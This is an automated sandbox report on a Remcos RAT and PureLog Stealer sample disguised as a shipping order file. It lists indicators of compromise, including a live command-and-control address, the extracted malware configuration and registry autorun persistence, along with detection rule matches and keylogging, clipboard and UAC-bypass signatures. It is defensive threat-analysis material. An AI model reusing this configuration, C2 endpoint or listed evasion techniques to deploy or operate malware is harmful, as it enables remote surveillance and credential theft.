
Windows Analysis Report
#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe

Overview

General Information

Sample name: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
renamed because original name is a hash value
Original sample name: 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
Analysis ID: 1564895
MD5: 2108fe4bc36c181c43d01825b56d8349
SHA1: 274e3b1be233129a95658fe508706c0ebc4114a5
SHA256: f36c39084b68e1c96f6d960a9def941304a3b2f93907d6650587125627baa89f
Tags: exe, user-threatcat_ch

Detection

PureLog Stealer, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • Adobe.exe (PID: 6604 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
    • Adobe.exe (PID: 1812 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
  • Adobe.exe (PID: 1352 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
    • Adobe.exe (PID: 5296 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
  • Adobe.exe (PID: 6608 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
    • Adobe.exe (PID: 5228 cmdline: "C:\ProgramData\Adobe\Adobe.exe" MD5: 2108FE4BC36C181C43D01825B56D8349)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["104.250.180.178:7902:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "Adobe.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Adobe_Nov-3XE9WN", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Adobe", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6af80:$a1: Remcos restarted by watchdog!
  • 0x6b4f8:$a3: %02i:%02i:%02i:%03i
(35 entries in total)

Source | Rule | Description | Author | Strings
0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
(33 entries in total)

                    System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Adobe\Adobe.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, ProcessId: 7152, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Adobe_Nov-3XE9WN
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Adobe\Adobe.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, ProcessId: 7152, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Adobe_Nov-3XE9WN

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T00:01:03.649524+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 104.250.180.178 | 7902 | TCP
2024-11-29T00:01:07.285991+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 178.237.33.50 | 80 | TCP


                    AV Detection

Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["104.250.180.178:7902:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "Adobe.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Adobe_Nov-3XE9WN", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Adobe", "Keylog folder": "remcos"}
Source: C:\ProgramData\Adobe\Adobe.exe | ReversingLabs: Detection: 65%
Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | ReversingLabs: Detection: 65%
Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2047950519.0000000001267000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2327232741.0000000001727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2170021457.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 1532, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 1812, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 5296, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 5228, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\Adobe\Adobe.exe | Joe Sandbox ML: detected
Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_44d5e8bd-f

                    Exploits

Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR

                    Privilege Escalation

Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00406764 _wcslen,CoGetObject
Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: uoct.pdbSHA2567B | source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, Adobe.exe.3.dr
Source: Binary string: uoct.pdb | source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, Adobe.exe.3.dr
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0044D5E9 FindFirstFileExA
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00406AC2 FindFirstFileW,FindNextFileW
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW

                    Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49707 -> 104.250.180.178:7902
Source: Malware configuration extractor | IPs: 104.250.180.178
Source: global traffic | TCP traffic: 192.168.2.5:49707 -> 104.250.180.178:7902
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 104.250.180.178
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: M247GB
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49709 -> 178.237.33.50:80
Source: unknown | TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_004260F7 recv
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, Adobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp, Adobe.exe, 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp$
Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR

                    E-Banking Fraud

Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2047950519.0000000001267000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2327232741.0000000001727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2170021457.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 1532, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 1812, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 5296, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 5228, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041BB77 SystemParametersInfoW,3_2_0041BB77

                    System Summary

                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
